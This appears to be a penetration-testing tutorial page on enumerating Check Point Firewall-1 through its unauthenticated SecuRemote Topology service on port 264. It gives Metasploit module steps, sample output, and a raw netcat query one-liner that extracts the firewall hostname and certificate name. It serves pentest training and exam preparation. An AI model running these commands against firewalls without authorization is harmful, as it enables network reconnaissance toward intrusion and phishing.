Check Point Firewall - Port 264
Become VeryLazyTech member! ๐
Follow us on:
โ Twitter @VeryLazyTech.
๐พ Github @VeryLazyTech.
๐ Medium @VeryLazyTech.
๐บ YouTube @VeryLazyTech.
๐ฉ Telegram @VeryLazyTech.
๐ต๏ธโโ๏ธ My Site @VeryLazyTech.
Visit our shop for e-books and courses. ๐
Basic info
CheckPoint Firewall-1 is a widely used firewall solution, but certain configurations allow attackers to extract valuable information about the firewall and its management station. This article will demonstrate how an attacker can leverage port 264/TCP to obtain critical details using publicly available tools and commands.
CheckPoint Firewall-1 includes a SecuRemote Topology service running on port 264/TCP, which allows unauthenticated queries. By interacting with this service, attackers can retrieve the firewall's hostname and the SmartCenter management station's nameโpotentially leading to further attacks.
The ability to obtain these details is particularly dangerous because it helps attackers map the network infrastructure, identify targets for further exploitation, and develop customized phishing attacks.
Exploiting CheckPoint Firewall-1 with Metasploit
Metasploit provides a module that can interact with the firewall to extract its hostname and management station name.
Step 1: Load the Metasploit Module
Open Metasploit and load the auxiliary module:
use auxiliary/gather/checkpoint_hostname
Step 2: Set Target IP Address
Set the RHOST parameter to the target CheckPoint Firewall-1 instance:
set RHOST 10.10.10.10
Step 3: Execute the Module
Run the module to interact with the firewall:
run
If the firewall is vulnerable, the module will successfully contact the SecuRemote Topology service and return output similar to:
[*] Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[+] Appears to be a CheckPoint Firewall...
[+] Firewall Host: FIREFIGHTER-SEC
[+] SmartCenter Host: FIREFIGHTER-MGMT.example.com
[*] Auxiliary module execution completed
This confirms the presence of the firewall and exposes its internal naming conventions.
Alternative Method: Extracting Hostname and ICA Name Manually
If Metasploit is unavailable, a direct Netcat command can be used to query the firewall:
Step 1: Send Query via Netcat
printf '\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00' | nc -q 1 10.10.10.10 264 | grep -a CN | cut -c 2-
Step 2: Analyze the Output
A successful query returns the firewallโs certificate name (CN) and organization (O):
CN=Panama,O=MGMTT.srv.rxfrmi
These values can be used to gain insights into the firewallโs identity and administrative domains.
Learn & practice For the OSCP.
Last updated
Was this helpful?